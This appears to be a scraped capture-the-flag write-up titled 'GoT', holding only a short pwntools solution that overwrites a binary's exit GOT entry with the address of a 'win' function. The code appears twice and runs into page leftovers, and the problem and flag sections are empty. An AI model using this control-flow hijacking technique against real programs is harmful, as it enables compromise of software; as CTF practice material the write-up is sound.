GoT
Problem
Solution
exit_got = exe.got['exit'] win_addr = exe.symbols['win']io.sendlineafter("Input address\n", str(exit_got)) io.sendlineafter("Input value?\n", str(win_addr))
Flag
Last updated
exit_got = exe.got['exit']
win_addr = exe.symbols['win'] io.sendlineafter("Input address\n", str(exit_got))
io.sendlineafter("Input value?\n", str(win_addr))Last updated